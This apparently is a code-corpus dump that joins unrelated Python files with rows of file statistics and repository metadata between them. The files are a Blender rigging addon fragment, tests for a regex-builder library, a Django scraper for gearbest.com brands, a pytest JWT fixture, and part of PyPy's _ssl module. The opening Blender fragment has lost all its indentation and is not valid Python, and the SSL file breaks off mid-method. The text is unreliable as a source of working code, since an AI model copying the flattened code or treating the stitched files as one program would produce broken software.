prefix, bone = bone_convert(arm.central_bones['spine3'][0])
ebone = armature.data.edit_bones[prefix + bone]
prefix, bone = bone_convert(arm.central_bones['neck'][0])
ebone2 = armature.data.edit_bones[prefix + bone]
elif arm.central_bones['spine3'] and arm.central_bones['spine2']:
prefix, bone = bone_convert(arm.central_bones['spine2'][0])
ebone = armature.data.edit_bones[prefix + bone]
prefix, bone = bone_convert(arm.central_bones['spine3'][0])
ebone2 = armature.data.edit_bones[prefix + bone]
if ebone and ebone2:
length = ebone.length
ebone.length = ebone.length*1.75
ebone2.tail = ebone.tail
ebone.length = length
ebone2.tail.y = ebone2.head.y
else:
#Gmod default viewmodels only have spine4, this aligns it
if arm.central_bones['spine4']:
prefix, bone = bone_convert(arm.central_bones['spine4'][0])
ebone = armature.data.edit_bones[prefix + bone]
ebone.tail.x = ebone.head.x
#Rotates bones with no children to be more readable while keeping their isolated form intact
if arm.chainless_bones:
for bone in arm.chainless_bones:
prefix, bone = bone_convert(bone)
ebone = armature.data.edit_bones[prefix + bone]
if type == 'anim':
if ebone.children[0].name.endswith('.isolated'):
ebone2 = armature.data.edit_bones[ebone.children[0].name]
ebone2.parent = None
bpy.ops.object.mode_set(mode='POSE')
bpy.ops.pose.armature_apply()
bpy.ops.pose.select_all(action='DESELECT')
bpy.ops.object.mode_set(mode='EDIT')
if type == 'anim':
for bone in arm.chainless_bones:
prefix, bone = bone_convert(bone)
ebone = armature.data.edit_bones[prefix + bone]
ebone2 = armature.data.edit_bones[prefix + bone + '.isolated']
ebone2.parent = ebone
armature.location = arm.armature.location
armature.rotation_euler = arm.armature.rotation_euler
armature.scale = arm.armature.scale
#Final touches to the armature
armature.data.display_type = 'OCTAHEDRAL'
armature.show_in_front = True
if type == 'weight':
armature.data.show_bone_custom_shapes = False
elif type == 'anim':
armature.data.rigify_advanced_generation = True
armature.data.rigify_generate_mode = 'new'
armature.data.rigify_rig_basename = arm.armature.name + '.anim'
bpy.ops.object.mode_set(mode='OBJECT')
#Deletion
elif action == 1 or action == 2:
#Checks if they weren't deleted already
if type == 'weight':
try:
bpy.data.objects.remove(arm.weight_armature)
except:
print("Weight armature already deleted, cleaning rest")
try:
bpy.data.armatures.remove(arm.weight_armature_real)
except:
pass
vatinfo.weight_armature = False
arm.weight_armature = None
arm.weight_armature_real = None
elif type == 'anim':
if not vatinfo.animation_armature_setup:
try:
animation_data = bpy.data.objects[arm.animation_armature_real['target_object']].data
bpy.data.objects[arm.animation_armature_real['target_object']].data = bpy.data.meshes[arm.animation_armature_real['target_object_data']]
bpy.data.meshes.remove(animation_data)
except:
pass
try:
bpy.data.objects.remove(arm.animation_armature)
except:
print("Animation armature already deleted, cleaning rest")
bpy.data.armatures.remove(arm.animation_armature_real)
if action == 1 and vatinfo.animation_armature_setup:
try:
object = bpy.data.objects[arm.armature.name + '.anim']
bpy.data.objects.remove(object)
except:
pass
try:
armature = bpy.data.armatures[arm.armature_real.name + '.anim']
bpy.data.armatures.remove(armature)
except:
pass
elif action == 2:
arm.animation_armature = bpy.data.objects[arm.armature.name + '.anim']
arm.animation_armature_real = bpy.data.armatures[arm.armature_real.name + '.anim']
#Checks if retarget empties are present, if so, remove them
if action == 1:
armature = arm.armature
#Removes viewmodel camera if present
try:
camera = bpy.data.objects['viewmodel_camera']
camera_data = bpy.data.cameras['viewmodel_camera']
bpy.data.objects.remove(camera)
bpy.data.cameras.remove(camera_data)
except:
pass
#Removes original armature constraints
for cat in arm.symmetrical_bones.keys():
for bone in arm.symmetrical_bones[cat].values():
for bone in bone:
if bone:
prefix, bone = bone_convert(bone)
try:
constraint = armature.pose.bones[prefix + bone].constraints["Retarget Location"]
armature.pose.bones[prefix + bone].constraints.remove(constraint)
except:
pass
try:
constraint = armature.pose.bones[prefix + bone].constraints["Retarget Rotation"]
armature.pose.bones[prefix + bone].constraints.remove(constraint)
except:
pass
for container, bone in arm.central_bones.items():
for bone in bone:
if bone:
try:
constraint = armature.pose.bones[prefix + bone].constraints["Retarget Location"]
armature.pose.bones[prefix + bone].constraints.remove(constraint)
except:
pass
try:
constraint = armature.pose.bones[prefix + bone].constraints["Retarget Rotation"]
armature.pose.bones[prefix + bone].constraints.remove(constraint)
except:
pass
for cat in arm.helper_bones.keys():
for container, bone in arm.helper_bones[cat].items():
if container == 'elbow' or container == 'knee':
for bone in bone:
if bone:
prefix2, bone2 = bone_convert(bone)
try:
constraint = armature.pose.bones[prefix2 + bone2].constraints["Retarget Location"]
armature.pose.bones[prefix2 + bone2].constraints.remove(constraint)
except:
pass
try:
constraint = armature.pose.bones[prefix2 + bone2].constraints["Retarget Rotation"]
armature.pose.bones[prefix2 + bone2].constraints.remove(constraint)
except:
pass
for container, bone in arm.other_bones.items():
if container == 'weapon' or container == 'viewmodel':
for bone in bone:
if bone:
prefix, bone = bone_convert(bone)
try:
constraint = armature.pose.bones[prefix + bone].constraints["Retarget Location"]
armature.pose.bones[prefix + bone].constraints.remove(constraint)
except:
pass
try:
constraint = armature.pose.bones[prefix + bone].constraints["Retarget Rotation"]
armature.pose.bones[prefix + bone].constraints.remove(constraint)
except:
pass
for container, bone in arm.custom_bones.items():
for bone in bone:
if bone:
try:
constraint = armature.pose.bones[bone].constraints["Retarget Location"]
armature.pose.bones[bone].constraints.remove(constraint)
except:
pass
try:
constraint = armature.pose.bones[bone].constraints["Retarget Rotation"]
armature.pose.bones[bone].constraints.remove(constraint)
except:
pass
try:
collection = bpy.data.collections["Retarget Empties ({})".format(arm.armature.name)[0:60]]
if collection.objects.values():
for object in collection.objects.values():
data = object.data
bpy.data.objects.remove(object)
bpy.data.collections.remove(collection)
except:
pass
arm.animation_armature = None
arm.animation_armature_real = None
vatinfo.animation_armature = False
#Reselects original armature for the sake of convenience
armature = arm.armature
if type == 'anim':
if armature.hide_get() == True:
armature.hide_set(False)
if armature.visible_get():
armature.select_set(True)
bpy.context.view_layer.objects.active = armature
#Thank you Orin for the enhanced code snippet
def bone_convert(bone):
    """Split a stored bone identifier into its (prefix, name) pair.

    Stored identifiers look like 'h1.bonename', where the code before the
    first dot selects which name prefix applies:
      'h' = helper, 'a' = attachment, 'p' = standard.
    Identifiers without a dot are returned unchanged with an empty prefix;
    an unrecognised code also yields an empty prefix.
    """
    vatinfo = bpy.context.scene.vatinfo
    parts = bone.split('.')
    if len(parts) == 1:
        # No marker code present; the raw name is the bone name.
        return '', parts[0]
    # Marker code -> prefix table (same mapping as the original chain).
    lookup = {
        'h1': Prefixes.helper,
        'h2': Prefixes.helper2,
        'a1': Prefixes.attachment,
        'a2': Prefixes.attachment2,
        'p1': vatinfo.prefix,
        'p2': Prefixes.other,
    }
    return lookup.get(parts[0], ''), parts[1]
def generate_shapekey_dict(dictionary, raw_list):
    """Sort raw shapekey names into *dictionary* buckets by facial region.

    Matching is substring based. The 'basis' check is independent, so a
    name may land in 'basis' AND one region slot; all other rules form a
    single first-match-wins chain per shapekey. Needles written in
    lowercase ('f01', 'frame1', ...) are matched against the lowercased
    name; all others against the uppercased name. Returns *dictionary*.
    """
    # (region, slot, candidate substrings) in the original priority order.
    rules = (
        ('eyebrows', 'AU1AU2', ('AU1AU2L', 'AU1AU2R')),
        ('eyebrows', 'AU1AU4', ('AU1AU4L', 'AU1AU4R')),
        ('eyebrows', 'AU2AU4', ('AU2AU4L', 'AU2AU4R')),
        ('eyebrows', 'AU1', ('AU1L', 'AU1R')),
        ('eyebrows', 'AU2', ('AU2L', 'AU2R')),
        ('eyebrows', 'AU4', ('AU4L', 'AU4R')),
        ('eyes', 'f01', ('f01', 'frame1')),
        ('eyes', 'f02', ('f02', 'frame2')),
        ('eyes', 'f03', ('f03', 'frame3')),
        ('eyes', 'f04', ('f04',)),
        ('eyes', 'AU42', ('AU42',)),
        ('cheek', 'AU6Z', ('AU6ZL', 'AU6ZR')),
        ('cheek', 'AU13', ('AU13L', 'AU13R')),
        ('nose', 'AU9', ('AU9L', 'AU9R')),
        ('nose', 'AU38', ('AU38',)),
        ('mouth', 'AU12', ('AU12L', 'AU12R')),
        ('mouth', 'AU15', ('AU15L', 'AU15R')),
        ('mouth', 'AU10', ('AU10L', 'AU10R')),
        ('mouth', 'AU17D', ('AU17DL', 'AU17DR')),
        ('mouth', 'AU16', ('AU16L', 'AU16R')),
        ('mouth', 'AU32', ('AU32',)),
        ('mouth', 'AU24', ('AU24',)),
        ('mouth', 'AU18Z', ('AU18ZL', 'AU18ZR')),
        ('mouth', 'AU22Z', ('AU22ZL', 'AU22ZR')),
        ('mouth', 'AD96L', ('AD96L',)),
        ('mouth', 'AD96R', ('AD96R',)),
        ('chin', 'AU31', ('AU31',)),
        ('chin', 'AU26', ('AU26L', 'AU26R')),
        ('chin', 'AU27', ('AU27L', 'AU27R')),
        ('chin', 'AU27Z', ('AU27ZL', 'AU27ZR')),
        ('chin', 'AD30L', ('AD30L',)),
        ('chin', 'AD30R', ('AD30R',)),
        ('chin', 'AU17', ('AU17L', 'AU17R')),
    )
    for shapekey in raw_list:
        # Basis is recorded independently of the region chain below
        # ('base' also covers 'basis', matching the original behaviour).
        folded = shapekey.casefold()
        if 'basis' in folded or 'base' in folded:
            dictionary['basis']['basis'] = shapekey
        upper = shapekey.upper()
        lower = shapekey.lower()
        for region, slot, needles in rules:
            haystack = lower if needles[0].islower() else upper
            if any(needle in haystack for needle in needles):
                dictionary[region][slot] = shapekey
                break
    return dictionary
def update_armature(self, context):
armature(1) | 53.180081 | 413 | 0.469749 | 11,754 | 130,823 | 5.112472 | 0.063893 | 0.045098 | 0.03894 | 0.036694 | 0.681222 | 0.576433 | 0.48454 | 0.437978 | 0.400053 | 0.365556 | 0 | 0.015287 | 0.424467 | 130,823 | 2,460 | 414 | 53.180081 | 0.782822 | 0.047629 | 0 | 0.457864 | 0 | 0 | 0.072784 | 0.000692 | 0 | 0 | 0 | 0 | 0 | 1 | 0.009125 | false | 0.009125 | 0.002684 | 0 | 0.01664 | 0.005904 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5e9585d7f1ca9ea63085498a5a7d9a868dd8c84d | 9,550 | py | Python | test/test_rex.py | dotwork/rex | 89c67feacbd4d7c07f68214cc9e02988ad05e2e2 | [
"MIT"
] | null | null | null | test/test_rex.py | dotwork/rex | 89c67feacbd4d7c07f68214cc9e02988ad05e2e2 | [
"MIT"
] | null | null | null | test/test_rex.py | dotwork/rex | 89c67feacbd4d7c07f68214cc9e02988ad05e2e2 | [
"MIT"
] | null | null | null | import os
import re
import unittest
from models import Rex
base_dir = os.path.dirname(__file__)
data_dir = os.path.join(base_dir, "data")
########################################################################################################################
class RexAssertions(unittest.TestCase):
    """Shared helpers for comparing Rex expressions against re patterns."""

    @staticmethod
    def load(filename):
        """Return the full text of a fixture file located in data_dir."""
        return open(os.path.join(data_dir, filename)).read()

    def assert_groups(self, text, rex, re_compiled, expected_groups):
        """Assert that both the hand-written pattern and the Rex-built
        pattern capture exactly *expected_groups* when searched in *text*."""
        expected = tuple(expected_groups)
        found = re.search(re_compiled, text).groups()
        self.assertEqual(expected, found,
                         msg="Regular expression failed: {} != {}".format(expected, found))
        print("Rex expression: ", rex.expression())
        found = re.search(rex.compile(), text).groups()
        self.assertEqual(expected, found,
                         msg="Rex expression failed: {} != {}".format(expected, found))
########################################################################################################################
class TestRexGroup(RexAssertions):
    """Group-capture behaviour of Rex-built expressions."""

    def test_plain_text(self):
        pattern = Rex().group.a.b.c.end_group
        self.assert_groups("abc", pattern, re.compile(r"(abc)"), expected_groups=("abc",))

    def test_single_group_in_parenthesis(self):
        pattern = Rex().group.open_parenthesis.a.b.c.close_parenthesis.end_group
        baseline = re.compile(r"(\(abc\))")
        expected = ("(abc)",)
        # Same group should be captured regardless of surrounding noise.
        for text in ("(abc)", "blah(abc)blah", "((blah)(abc)(blah))"):
            self.assert_groups(text, pattern, baseline, expected)

    def test_multiple_groups_in_parenthesis(self):
        pattern = (Rex().group.open_parenthesis.a.b.c.close_parenthesis.end_group
                   .zero_or_more_of_any_character.optional
                   .group.open_parenthesis.e.f.g.close_parenthesis.end_group)
        baseline = re.compile(r"(\(abc\)).*?(\(efg\))")
        expected = ("(abc)", "(efg)")
        for text in ("(abc)(efg)", "blah(abc)blah(efg)", "((blah)(abc)(bl(efg)ah))"):
            self.assert_groups(text, pattern, baseline, expected)
########################################################################################################################
class TestRex(RexAssertions):
    """General equivalence tests between Rex-built patterns and reference regexes."""
    ####################################################################################################################
    def assert_expression(self, text, rex, re_compiled):
        """Assert that both the reference pattern and the Rex pattern match text."""
        self.assertTrue(re.search(re_compiled, text))
        self.assertTrue(re.search(rex.compile(), text))
    ####################################################################################################################
    def test_plain_text(self):
        blah = Rex().b.l.a.h
        self.assert_expression("blergblahb loasdf", blah, re.compile("blah"))
        # since each property returns 'self', calling more will
        # append more characters to _expression/expression()
        blahbloop = blah.b.l.o.o.p
        self.assert_expression("blergblahbloop loasdf", blahbloop, re.compile("blahbloop"))
        carlos = Rex().C.a.r.l.o.s
        self.assert_expression("blergblahbloop loasdf", blahbloop, re.compile("blahbloop"))
        self.assert_expression("blerCarlosp loasdf", carlos, re.compile("Carlos"))
        # blah and blahbloop should be the same object
        self.assertEqual(blah, blahbloop)
        self.assertNotEqual(blah, carlos)
        # 'carlos' comes from a separate Rex() instantiation, so it should
        # be a distinct object from the others.
        self.assertNotEqual(blahbloop, carlos)
    ####################################################################################################################
    def test_datetimes(self):
        re_compiled = re.compile("10-22-2016 7:51 am")
        rex = (Rex()._1._0.dash._2._2.dash._2._0._1._6
               .single_space
               ._7.colon._5._1.single_space.a.m)
        self.assert_expression("The date is 10-22-2016 7:51 am right now.", rex, re_compiled)
    ####################################################################################################################
    def test_5_digit_zip_code(self):
        # raw string: "\d" is an invalid escape sequence in a plain string
        self.assert_expression("blah73139 blah", Rex()._5.digits, re.compile(r"\d{5}"))
    ####################################################################################################################
    def test_phone_number_pattern__with_dashes(self):
        self.assert_groups(text="blah405-867-5309 blah 723",
                           rex=Rex().group._3.digits.dash._3.digits.dash._4.digits.end_group,
                           re_compiled=re.compile(r"(\d{3}-\d{3}-\d{4})"),
                           expected_groups=("405-867-5309",))
    ####################################################################################################################
    def test_phone_number_pattern__with_dots(self):
        self.assert_groups(text="blah405.867.5309 blah 723",
                           rex=(Rex().group
                                ._3.digits.dot._3.digits.dot._4.digits
                                .end_group),
                           re_compiled=re.compile(r"(\d{3}\.\d{3}\.\d{4})"),
                           expected_groups=("405.867.5309",))
    ####################################################################################################################
    def test_phone_number_pattern__with_parenthesis(self):
        self.assert_groups(text="blah(405) 867-5309 blah 723",
                           rex=(Rex().group
                                .open_parenthesis._3.digits.close_parenthesis
                                .single_space._3.digits.dash._4.digits
                                .end_group),
                           re_compiled=re.compile(r"(\(\d{3}\)\s\d{3}-\d{4})"),
                           expected_groups=("(405) 867-5309",))
    ####################################################################################################################
    def test_phone_number_pattern__with_groups(self):
        rex = (Rex().open_parenthesis
               .group._3.digits.end_group
               .close_parenthesis.single_space
               .group._3.digits.end_group
               .dash
               .group._4.digits.end_group)
        re_compiled = re.compile(r"\((\d{3})\)\s(\d{3})-(\d{4})")
        self.assert_groups(text="Phone number (405) 867-5309.",
                           rex=rex,
                           re_compiled=re_compiled,
                           expected_groups=("405", "867", "5309"))
    ####################################################################################################################
    def test_zero_or_more_of(self):
        rex = (Rex().less_than_sign.s.p.a.n.greater_than_sign
               .group.zero_or_more_of.any_character.end_group
               .less_than_sign.forwardslash.s.p.a.n.greater_than_sign)
        re_compiled = re.compile("<span>(.*)</span>")
        self.assert_groups(text="<span>heyo</span>",
                           rex=rex,
                           re_compiled=re_compiled,
                           expected_groups=["heyo"])
        self.assert_groups(text="<span></span>",
                           rex=rex,
                           re_compiled=re_compiled,
                           expected_groups=[""])
        self.assert_groups(text="<span>*</span>",
                           rex=rex,
                           re_compiled=re_compiled,
                           expected_groups=["*"])
########################################################################################################################
class TestRexAgainstPrices(RexAssertions):
    """Tests matching currency amounts with Rex-built patterns."""
    ####################################################################################################################
    def test_with_2_decimals(self):
        # raw string avoids invalid "\$" / "\d" escape sequences; the
        # compiled pattern is byte-identical to the original.
        re_compiled = re.compile(r'\$(\d+\.\d{2})')
        rex = Rex().group.one_or_more_numbers.dot._2.numbers.end_group
        self.assert_groups(text="The price is $19.99 plus tax.",
                           rex=rex,
                           re_compiled=re_compiled,
                           expected_groups=["19.99"])
    ####################################################################################################################
    def test_ending_in_9(self):
        re_compiled = re.compile(r'\$(\d+\.\d9)')
        rex = Rex().group.one_or_more_numbers.dot.digit._9.end_group
        self.assert_groups(text="The prices are is $19.99 plus tax.",
                           rex=rex,
                           re_compiled=re_compiled,
                           expected_groups=["19.99"])
| 51.069519 | 120 | 0.43644 | 876 | 9,550 | 4.504566 | 0.189498 | 0.083629 | 0.064876 | 0.079067 | 0.601622 | 0.506082 | 0.416878 | 0.367461 | 0.342119 | 0.279777 | 0 | 0.023555 | 0.217592 | 9,550 | 186 | 121 | 51.344086 | 0.50455 | 0.026597 | 0 | 0.192 | 0 | 0 | 0.118493 | 0.016969 | 0 | 0 | 0 | 0 | 0.28 | 1 | 0.128 | false | 0 | 0.032 | 0.008 | 0.2 | 0.008 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5e960a8f772219fae68b8457d40dccf32514388f | 751 | py | Python | scrapping/management/commands/brands.py | xeroz/gshop | d1bd0920d8ffaae9e7f52fcf8d60dd2d009cde2a | [
"MIT"
] | null | null | null | scrapping/management/commands/brands.py | xeroz/gshop | d1bd0920d8ffaae9e7f52fcf8d60dd2d009cde2a | [
"MIT"
] | 4 | 2020-02-11T21:31:46.000Z | 2020-06-05T00:43:08.000Z | scrapping/management/commands/brands.py | xeroz/gshop | d1bd0920d8ffaae9e7f52fcf8d60dd2d009cde2a | [
"MIT"
] | null | null | null | from django.core.management.base import BaseCommand
from bs4 import BeautifulSoup
import requests
from apps.products.models import ShopDepartment, Brand
class Command(BaseCommand):
    """Management command that scrapes brand listings from gearbest.com.

    NOTE(review): the loop body below computes ``results`` and initialises
    ``cont`` but never uses either, and ``pk`` is assigned but unused —
    the command looks truncated or unfinished; confirm against the
    original source before relying on it.
    """

    def handle(self, *args, **options):
        # Start from a clean slate: drop every previously stored brand.
        Brand.objects.all().delete()
        url_base = 'https://www.gearbest.com'
        # Only departments flagged as active are scraped.
        shop_departments = ShopDepartment.objects.filter(active=True)
        pk = 0  # NOTE(review): assigned but never used in the visible code
        for shop_department in shop_departments:
            print(url_base + shop_department.web_url)
            url_shop = url_base + shop_department.web_url
            # Fetch and parse the department page.
            url = requests.get(url_shop)
            soup = BeautifulSoup(url.text, 'html.parser')
            # The scraper targets <section class="block_b"> elements.
            results = soup.find_all('section', attrs={'class': 'block_b'})
            cont = 0
| 31.291667 | 74 | 0.660453 | 90 | 751 | 5.355556 | 0.6 | 0.043568 | 0.045643 | 0.087137 | 0.124481 | 0.124481 | 0.124481 | 0 | 0 | 0 | 0 | 0.005254 | 0.23968 | 751 | 23 | 75 | 32.652174 | 0.838879 | 0 | 0 | 0 | 0 | 0 | 0.071904 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.058824 | false | 0 | 0.235294 | 0 | 0.352941 | 0.058824 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5e96d10c6dfb2e778fd6a5f0ef1d12d94ce2fa31 | 354 | py | Python | src/util/test_client.py | fibasile/ticket-gateway | 811a216281a17150adca3edf691f9cf5a1478d2f | [
"MIT"
] | null | null | null | src/util/test_client.py | fibasile/ticket-gateway | 811a216281a17150adca3edf691f9cf5a1478d2f | [
"MIT"
] | null | null | null | src/util/test_client.py | fibasile/ticket-gateway | 811a216281a17150adca3edf691f9cf5a1478d2f | [
"MIT"
] | null | null | null | import pytest
from flask_jwt_extended import create_access_token
@pytest.fixture(scope='session')
def test_client(flask_app):
    """Session-scoped Flask test client pre-authorised with a JWT.

    The token is created inside an application context (required by
    flask_jwt_extended's create_access_token) and injected into every
    request via the ``Authorization: Bearer <token>`` header.

    NOTE(review): original indentation was ambiguous in this copy — the
    client-creation lines are assumed to sit inside the app context;
    behaviour is the same either way, but confirm against the original.
    """
    with flask_app.app_context():
        token = create_access_token(identity='testclient')
        client = flask_app.test_client()
        client.environ_base['HTTP_AUTHORIZATION'] = 'Bearer ' + token
        return client
| 29.5 | 69 | 0.728814 | 44 | 354 | 5.545455 | 0.590909 | 0.098361 | 0.139344 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.177966 | 354 | 11 | 70 | 32.181818 | 0.838488 | 0 | 0 | 0 | 0 | 0 | 0.118644 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0 | 0.222222 | 0 | 0.444444 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5e9f3f08204ee8f26c7ee597a5331c470cf5a81b | 35,006 | py | Python | pypy/module/_ssl/interp_ssl.py | benoitc/pypy | a3e1b12d1d01dc29056b7badc051ffc034297658 | [
"MIT"
] | 1 | 2020-01-21T11:10:51.000Z | 2020-01-21T11:10:51.000Z | pypy/module/_ssl/interp_ssl.py | benoitc/pypy | a3e1b12d1d01dc29056b7badc051ffc034297658 | [
"MIT"
] | null | null | null | pypy/module/_ssl/interp_ssl.py | benoitc/pypy | a3e1b12d1d01dc29056b7badc051ffc034297658 | [
"MIT"
] | null | null | null | from __future__ import with_statement
from pypy.rpython.lltypesystem import rffi, lltype
from pypy.interpreter.error import OperationError
from pypy.interpreter.baseobjspace import Wrappable
from pypy.interpreter.typedef import TypeDef
from pypy.interpreter.gateway import interp2app, unwrap_spec
from pypy.rlib.rarithmetic import intmask
from pypy.rlib import rpoll, rsocket
from pypy.rlib.ropenssl import *
from pypy.module._socket import interp_socket
## user defined constants
# Maximum length of the buffers used for X509_NAME_oneline() output.
X509_NAME_MAXLEN = 256
## # these mirror ssl.h
PY_SSL_ERROR_NONE, PY_SSL_ERROR_SSL = 0, 1
PY_SSL_ERROR_WANT_READ, PY_SSL_ERROR_WANT_WRITE = 2, 3
PY_SSL_ERROR_WANT_X509_LOOKUP = 4
PY_SSL_ERROR_SYSCALL = 5 # look at error stack/return value/errno
PY_SSL_ERROR_ZERO_RETURN, PY_SSL_ERROR_WANT_CONNECT = 6, 7
# start of non ssl.h errorcodes
PY_SSL_ERROR_EOF = 8 # special case of SSL_ERROR_SYSCALL
PY_SSL_ERROR_INVALID_ERROR_CODE = 9

# Certificate-verification requirements (mirror CERT_* app-level constants).
PY_SSL_CERT_NONE, PY_SSL_CERT_OPTIONAL, PY_SSL_CERT_REQUIRED = 0, 1, 2

# Handshake side selectors.
PY_SSL_CLIENT, PY_SSL_SERVER = 0, 1

# Protocol-version selectors (indices into the PROTOCOL_* constants below).
(PY_SSL_VERSION_SSL2, PY_SSL_VERSION_SSL3,
 PY_SSL_VERSION_SSL23, PY_SSL_VERSION_TLS1) = range(4)

# Return values of check_socket_and_wait_for_timeout() ("timeout_state" enum).
SOCKET_IS_NONBLOCKING, SOCKET_IS_BLOCKING = 0, 1
SOCKET_HAS_TIMED_OUT, SOCKET_HAS_BEEN_CLOSED = 2, 3
SOCKET_TOO_LARGE_FOR_SELECT, SOCKET_OPERATION_OK = 4, 5

HAVE_RPOLL = True  # Even win32 has rpoll.poll

# App-level constants exported by the module.
constants = {}
constants["SSL_ERROR_ZERO_RETURN"] = PY_SSL_ERROR_ZERO_RETURN
constants["SSL_ERROR_WANT_READ"] = PY_SSL_ERROR_WANT_READ
constants["SSL_ERROR_WANT_WRITE"] = PY_SSL_ERROR_WANT_WRITE
constants["SSL_ERROR_WANT_X509_LOOKUP"] = PY_SSL_ERROR_WANT_X509_LOOKUP
constants["SSL_ERROR_SYSCALL"] = PY_SSL_ERROR_SYSCALL
constants["SSL_ERROR_SSL"] = PY_SSL_ERROR_SSL
constants["SSL_ERROR_WANT_CONNECT"] = PY_SSL_ERROR_WANT_CONNECT
constants["SSL_ERROR_EOF"] = PY_SSL_ERROR_EOF
constants["SSL_ERROR_INVALID_ERROR_CODE"] = PY_SSL_ERROR_INVALID_ERROR_CODE
constants["CERT_NONE"] = PY_SSL_CERT_NONE
constants["CERT_OPTIONAL"] = PY_SSL_CERT_OPTIONAL
constants["CERT_REQUIRED"] = PY_SSL_CERT_REQUIRED

# SSLv2 may be compiled out of the OpenSSL build.
if not OPENSSL_NO_SSL2:
    constants["PROTOCOL_SSLv2"] = PY_SSL_VERSION_SSL2
constants["PROTOCOL_SSLv3"] = PY_SSL_VERSION_SSL3
constants["PROTOCOL_SSLv23"] = PY_SSL_VERSION_SSL23
constants["PROTOCOL_TLSv1"] = PY_SSL_VERSION_TLS1

constants["OPENSSL_VERSION_NUMBER"] = OPENSSL_VERSION_NUMBER
# Unpack OPENSSL_VERSION_NUMBER into its component fields — the divmod
# chain peels off the status nibble, then the patch/fix/minor/major bytes
# (presumably the 0xMNNFFPPS layout documented by OpenSSL — confirm).
ver = OPENSSL_VERSION_NUMBER
ver, status = divmod(ver, 16)
ver, patch = divmod(ver, 256)
ver, fix = divmod(ver, 256)
ver, minor = divmod(ver, 256)
ver, major = divmod(ver, 256)
constants["OPENSSL_VERSION_INFO"] = (major, minor, fix, patch, status)
constants["OPENSSL_VERSION"] = SSLEAY_VERSION
def ssl_error(space, msg, errno=0):
    """Build an OperationError wrapping the module's app-level SSL error.

    The exception class comes from get_error(space); it is instantiated
    with (errno, msg), matching socket.sslerror's calling convention.
    """
    w_cls = get_error(space)
    w_errno = space.wrap(errno)
    w_msg = space.wrap(msg)
    w_value = space.call_function(w_cls, w_errno, w_msg)
    return OperationError(w_cls, w_value)
if HAVE_OPENSSL_RAND:
    # helper routines for seeding the SSL PRNG

    @unwrap_spec(string=str, entropy=float)
    def RAND_add(space, string, entropy):
        """RAND_add(string, entropy)

        Mix string into the OpenSSL PRNG state. entropy (a float) is a lower
        bound on the entropy contained in string."""
        # Copy the string into a raw buffer for the C call, and always
        # free it afterwards.
        buf = rffi.str2charp(string)
        try:
            libssl_RAND_add(buf, len(string), entropy)
        finally:
            rffi.free_charp(buf)

    def RAND_status(space):
        """RAND_status() -> 0 or 1

        Returns 1 if the OpenSSL PRNG has been seeded with enough data and 0 if not.
        It is necessary to seed the PRNG with RAND_add() on some platforms before
        using the ssl() function."""
        res = libssl_RAND_status()
        return space.wrap(res)

    @unwrap_spec(path=str)
    def RAND_egd(space, path):
        """RAND_egd(path) -> bytes

        Queries the entropy gather daemon (EGD) on socket path. Returns number
        of bytes read. Raises socket.sslerror if connection to EGD fails or
        if it does provide enough data to seed PRNG."""
        socket_path = rffi.str2charp(path)
        try:
            bytes = libssl_RAND_egd(socket_path)
        finally:
            rffi.free_charp(socket_path)

        if bytes == -1:
            # -1 signals both connection failure and insufficient entropy.
            msg = "EGD connection failed or EGD did not return"
            msg += " enough data to seed the PRNG"
            raise ssl_error(space, msg)
        return space.wrap(bytes)
class SSLObject(Wrappable):
    """Interp-level wrapper around an OpenSSL SSL connection.

    Owns raw OpenSSL structures (SSL_CTX, SSL, peer X509) plus two raw
    char buffers holding the one-line renderings of the peer's subject
    and issuer names.  All raw resources are released in destructor().
    """

    def __init__(self, space):
        self.space = space
        self.w_socket = None          # app-level socket this SSL object wraps
        self.ctx = lltype.nullptr(SSL_CTX.TO)
        self.ssl = lltype.nullptr(SSL.TO)
        self.peer_cert = lltype.nullptr(X509.TO)
        # Raw, NUL-initialised buffers for X509_NAME_oneline() output.
        self._server = lltype.malloc(rffi.CCHARP.TO, X509_NAME_MAXLEN, flavor='raw')
        self._server[0] = '\0'
        self._issuer = lltype.malloc(rffi.CCHARP.TO, X509_NAME_MAXLEN, flavor='raw')
        self._issuer[0] = '\0'
        self.shutdown_seen_zero = False   # see shutdown() retry logic

    def server(self):
        # One-line subject name of the peer certificate (filled by do_handshake).
        return self.space.wrap(rffi.charp2str(self._server))

    def issuer(self):
        # One-line issuer name of the peer certificate (filled by do_handshake).
        return self.space.wrap(rffi.charp2str(self._issuer))

    def __del__(self):
        self.enqueue_for_destruction(self.space, SSLObject.destructor,
                                     '__del__() method of ')

    def destructor(self):
        # Free every raw OpenSSL structure and buffer owned by this object.
        assert isinstance(self, SSLObject)
        if self.peer_cert:
            libssl_X509_free(self.peer_cert)
        if self.ssl:
            libssl_SSL_free(self.ssl)
        if self.ctx:
            libssl_SSL_CTX_free(self.ctx)
        lltype.free(self._server, flavor='raw')
        lltype.free(self._issuer, flavor='raw')

    @unwrap_spec(data='bufferstr')
    def write(self, data):
        """write(s) -> len

        Writes the string s into the SSL object. Returns the number
        of bytes written."""
        self._refresh_nonblocking(self.space)

